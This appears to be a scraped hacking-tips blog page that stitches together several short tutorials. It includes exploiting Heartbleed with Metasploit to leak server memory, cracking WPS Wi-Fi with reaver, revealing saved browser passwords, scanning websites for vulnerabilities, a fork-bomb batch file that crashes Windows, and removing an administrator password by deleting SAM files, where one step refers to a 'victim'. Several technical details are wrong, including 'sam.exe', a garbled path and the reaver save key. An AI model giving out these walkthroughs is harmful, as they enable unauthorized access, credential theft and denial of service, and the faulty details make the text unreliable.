Reveal The Passwords Hidden Behind Asteriks

Many of use the ‘Password Remember’ feature of modern day browsers to remember the passwords of the site’s which we frequently visit. Why shouldn’t we? It makes browsing so much convenient that we can sign-in for websites with just a single click.


But there are also some drawbacks, as you have not actually typed your password for a while you may forget it which will result in a lot of hassle if you need to open the same account from anywhere else.

Don’t Miss :- Using Same E-mail Address For Creating Multiple Accounts

Also, as an added security layer all browsers masks the typed passwords with asteriks or small dots making it impossible for a person standing nearby to look over your shoulder to see the password.

Assume that you are on G-mail login page and the user-id and password is automatically filled by the browser but you don’t remember the password, what you should do now in this case? Well in this post i’m going to introduce you to a little trick that will reveal the password hidden behind the asteriks without the help of any application or browser add-ons.




Revealing The Passwords Hidden Behind Asteriks :-

  • First of all, right click on the password field where the password is already typed but hidden.
  • Select the option ‘Inspect Element’
  • Now Document Inspection Window will open highlighting a line like this :
  • <input type=’password’
  • What you should do now is just replace the term ‘password’ in the above line with ‘text’ like this :
  • <input type=’text’
  • After following the above instructions as soon as you press Enter the password which was hidden will now be shown in plaintext.

Cool right.!! Now you can use this trick to get all the passwords which you’ve forgotten but your browsers remembers.


Also See :- Bypassing Online Surveys Easily

List Of Top 100 Proxy Servers

What Are Proxy Servers :-


Imagine yourself to be in a controlled network where you can’t access certain websites, so what will you do?
This is where proxy servers comes in, they redirect your network traffic through their servers so that you can access those websites because their servers are not blocked to access that site.

Check Out : Hacking Router Password

In this tutorial, i’m going to list top 100 best anonymous proxy servers using which you can access certain blocked sites and also get some form of anonymity.

List Of Top 100 Proxy Servers :-

  • Star Doll Proxy –
  • HideMyAss UK –
  • F4FP –
  • TiaFun-
  • Proxy 4 Freedom –
  • WebSurf Proxy –
  • Fish Proxy –
  • DZ Hot –
  • 1FreeProxy –
  • Sporium –
  • Saoudi Proxy –
  • Proxy Browse –
  • Proxy Internet –
  • Jezus Loves This Proxy –
  • German Proxy –
  • CA Proxies –
  • Proxy 2015 –
  • FB Proxies –
  • America Proxy –
  • PK Proxy –
  • Suede Proxy –
  • To Proxy –
  • PHProxy –
  • London Proxy –
  • Kr Proxy –
  • Brazil Proxy –
  • Canada Proxy –
  • US Proxy –
  • Spedo –
  • US Proxy –
  • You Liaoren –
  • Zacebook PK –
  • Proxys –
  • Justun Block IT –
  • Network ByPass –
  • Go Proxy –
  • Proxy This –
  • Me Hide –
  • Zalmos –
  • kProxy Site –
  • Xite Now –
  • Hidden Digital –
  • Surf For Free –
  • Intern Cloud –
  • Singapore Proxy –
  • PRO Intern –
  • Fast Time –
  • Work Host –
  • Travel VPN –
  • Proxy Call MeNames –
  • Host App –
  • HideMyAss –
  • Proxify –
  • Ninja Clock –
  • AnonyMouse –
  • AnonyMizer –
  • kProxy –
  • BlewPass –
  • Zfreez –
  • Vobas –
  • Don’t Filter –
  • Vtunnel –
  • –
  • New Ip Now –
  • –
  • 4everproxy –
  • Unblock My Web –
  • YouTube Unblock Proxy –
  • Working Proxy –
  • Free Open Proxy –
  • Proxy 2014 –
  • Unblock YouTube Free –
  • Free YouTube –
  • HideOnline Proxy –
  • Rapid Proxy –
  • Unblock YouTube Beat School –
  • Hiding Your Info –
  • Unblocker –
  • Fast USA Proxy –
  • YouTube Free Proxy –
  • Proxyo –
  • Quickproxy –
  • Defilter –
  • Free Proxy Server –
  • Free YouProxyTube –
  • The Best Proxy –
  • EXCS –
  • Just Proxy –
  • Proxy-2014 –
  • VPN Browse –
  • ProxyOne –
  • Web Proxy Free –
  • Can’t Block This –
  • Hide The Internet –
  • Greatest Free Proxy –
  • Proxay –
  • ViewTube –
  • PRO Unblock –
  • Fun Proxy –
  • Working Proxy –
Now break those barriers and access the block sites using this (by far) the best proxy servers list.

How To Exploit The Heartbleed Bug

On 07, April 2014 a patch was released for OpenSSL to fix a very controversial vulnerablility – The Heartbleed Bug. According to a report, over 500,000 servers were found to be vulnereable but more and more admins are now patching their machines and the numbers are decreasing steadily.


Affected servers are vulnerable to hacking (extraction of information such as user credential’s, cookies, server private keys, Personal Identification Info etc. from the memory). The bug is so big that major websites like Google, Facebook, Tumblr, Instagram, Yahoo, Pinterest etc. were also vulnerable. This exploit is in existence for more than 2 years without anyone’s attention.

In this post you’ll learn to exploit the Heartbleed bug for getting a buggy website’s OpenSSL to spill the contents of its memory and possibly give us the user’s credentials and other information.

Requirement :-
For this tutorial we will be using a great tool i.e. Metasploit Framework. It’s pre-included in Kali Linux.


Steps To Follow :-

First of all, if you’ve haven’t updated your metasploit framework in quit a while i would recommend it doing now, open up a terminal window and type the following command :


  • msfupdate 
It could take a while for the framework to update. Once the update process is complete we are good to go.
Start the metasploit framework by typing :
  • msfconsole
Now we will search for the heartbleed exploit using inbuilt search function :
  • search heartbleed
Load up the auxilliary module by typing :
  • use auxiliary/scanner/ssl/openssl_heartbleed
The heartbleed module is now loaded. If you wish to find more information about the module, you may type :
  • info
This command reveals the options that we can set in order to use this module and a description of the module.
Now we have to set RHOST. RHOST is the ip address of the website which is vulnerable to the exploit.
  •  set RHOSTS 
  •  set verbose true 
It’s almost done now, just enter the following command :
  • run
If everything went as planned the server will leak about 64K bytes of what was in its memory. This could contain anything from username-password pairs to credit card numbers which is why this hack (along with pretty much all others) is very much illegal to actually try on a live website without the developer’s explicit consent.

Easiest Way To Find Vulnerablility (Bugs) In A Website

In this post we’re going to discuss an automated vulnerability discovery tool for websites – Uniscan. This tool is the creation of SourceForge Project and is written in perl language.
It scan websites and web applications for various security issues like SQLi, RFI, LFI, XSS etc.For this tutorial, we are going to use Kali Linux because Uniscan is preinstalled and it saves us a lot of hassle. If you don’t have kali linux installed or cannot figure out how to install it, I would recommend taking a look at my previous post – How To Install Kali Linux.Running and using Uniscan is quite simple, just open up a Terminal Window and type ‘uniscan‘ and the list of options and examples will be listed.



Check Out : Easy Ways To Prevent DDOS Attacks

Scanning :-
In the image above under the Usage heading examples are given on using Uniscan, try the first option.


The above example scans a single url for basic information.

Fingerprinting :-
With the option ‘j’ uniscan would fingerprint the server of the url. Server fingerprinting simply runs commands like ping, traceroute, nslookup, nmap on the server ip address and packs the results together.


Another option is ‘g’ which does web based fingerprinting. It looks up specific urls.



Search The Search Engines :-
Uniscan can also perform bing and google searches and store the result in a text file. The i option can be used for searching bing and o operator for google. To search bing for all domains hosted on a given ip address issue the following command :
Replace the x’s with your target ip. The results are saved in a file called sites.txt which can be found at ‘/usr/share/uniscan’. They should ideally be saved in the home directory of the user or the working directory.
For searching google, use the following command :
Use this tool carefully because google may block too many automated search queries.
As the internet is endless so are the possibilities of using this tool. So go and find those vulnerabilities on them websites.

How To Hide Drives in Windows

In this tutorial i’m going to show you, how to hide a drive. Yes you read it right, you can hide whole drives for whatever purpose you want (security, fun, pranks etc.).


Steps To Follow :-

  • Go to run .
  • Type “diskpart”.
  • Type “list volume”.
  • Now select the volume you want to hide by typing “select volume n”(n is the volume number against the drive you want to hide). eg: select volume 2.
  • Type “remove letter x”(x is the drive name). Eg: remove letter D. Done, now check my computer .
  • If you want to show the drive again then repeat step 1 to 4 then type “assign letter x”.
**Don’t try with drive C **
Now, prank your friends and Have Fun..!!

Hacking WPS Enabled Wifi Networks With Reaver

In this tutorial i’m going to show you yet another way of cracking wifi networks. Today we are going to exploit a loophole in the newest feature of modern day routers, which is WPS (Wireless Protected Setup).This will work only if WPS is enabled on the router, which generally is.


What You’ll Need :-
  • Preferably a PC with kali linux or Backtrack installed.
To crack WPS network we are going to use an awesome tool, REAVER-WPS created by Reaver-Systems

Don’t Miss :-

Cracking WPA/WPA-2 Networks


Cracking WiFi (W.E.P Networks)

Steps To Follow :-

Open up a terminal window and put you wireless card into Monitor mode by typing:

  • airmon-ng start wlan0
Next, we will need the MAC Address of the router we are going to attack. Get this by typing:
  • airodump-ng mon0 or wash -i mon0
Now the list of routers available in the vicinity should appear, copy the address of targeted network.
Next, we start up reaver.
  • reaver -i mon0 -b MACADDRESSHERE -vv
Some Access Points tend to lock their W.P.S. state if they detect any suspicious activity for 5 minutes or so, in that case reaver will not carry on bruteforcing until the A.P. comes out of the locked state. The default period of reaver to check for the unlocked state is 315 seconds or 5 min 15 seconds. This can be increased or decreased using the ‘lock-delay’ option while launching reaver like this :
  • reaver -i mon0 -b MACADDRESSHERE -vv –lock-delay=300
You can also alter the time between pin attempts to fool the A.P. of any suspicious activity (default is 1 second) but it can increase the total bruteforcing time. If you need to use this delay feature use this command :
  • reaver -i mon0 -b MACADDRESSHERE -vv -d 5

Now just sit back and let the program do it’s work. It can take as long as 24+ hours for a weak signal. But usually less than 12 hours.

If you need to use your PC in the mean time, just save your work by pressing:
  • CTRL + ALT + C
And restart it from the same point just by following step 3 of the process.


Hide Data Behind Images

Hide Data Behind Images Without Using Any Software :-


In the following tutorial i will show you how you can hide data behind images without using any exotic software.

  • Create a folder in your C drive and name it “hide”.
  • Now you can put anything and everything you want to hide in this folder.
  • After putting everything you want to hide in the “hide” folder, Right click on it and click “Add to hide.rar”  or “Add to archive” and create a “.rar” file.
  • Now you need to open up the command prompt and change to the working directory, which is C in our case. Type cd
  • Also put an image in the same directory as of the “.rar” file.
  • Now type copy /b image.jpg + hide.rar output.jpg
Here image.jpg is the image file which going to be used as camouflage, hide.rar is the rar file you created and output.jpg is the output file which will be created.
After these steps we will get an output file which will open as a normal image but will also contain the data of the rar file we created.
To access the data of the rar file, Right click on the output file and select “Open with => WinRar”
Now you can Enjoy your little secret.

How To Easily Crash A Windows P.C. Using A Fork Bomb

The technique used here is known as ‘Fork Bomb’. A fork bomb is the equivalent of a D.O.S. attack on your own system. It aims at depriving the system off it’s Random Access Memory, leaving none for vital functions required to keep the system running, hence crashing it. Just 5 characters long, the fork bomb is not deadly to a computer, just annoying.

Follow these simple steps to create a ‘Fork Bomb’ :-

  • Open a text editor like Notepad.
  • Type  %0|%0  
  • Save the file as ‘Crash.bat’ and that’s it.
Run the file and the system will crash in a matter of seconds.

Remove Pesky Shortcut and Autorun Virus

If Your P.C has a nasty virus which creates shortcuts everywhere, hides you files and folders, changes extensions of your files and corrupt them then you will be frustrated for sure. But you can get them back to normal by using this small piece of software that i created :-

Step 1

Download Skynet_Virus_Removal tool.

Step 2

Run the Program and you will be greeted with this screen.
Enter the Drive name which you want to clean. For Example: If it is C drive then enter C:

Step 3

A little caution.

Step 4

Now, the Drive is being cleaned. Wait for some time.

Step 5

The process is now complete.
If you want to clean any other Drive, Press Y otherwise N.

“Deleting administrator Password” without any software

Deleting Administrator Password Without any software

Method 1:

Boot up with an alternate OS and delete the sam.exe and sam.log files from Windowssystem32config in your hard drive. Now when you boot up again in windows the password on your built-in administrator account which will be blank (i.e No password). This solution works only if your hard drive is FAT type.

Method 2:

Step 1. Put your hard disk of your computer in any other pc.
Step 2. Boot that computer and use your hard disk as a secondary hard disk.
           (Dont boot as primary hard disk )
Step 3. Then open that drive in which the victim’s window(or your window) is installed.
Step 4. Go to location windows->system32->config
Step 5. And delete SAM.exe and SAM.log
Step 6. Now remove hard disk and put in your computer.
Step 7. And boot your computer.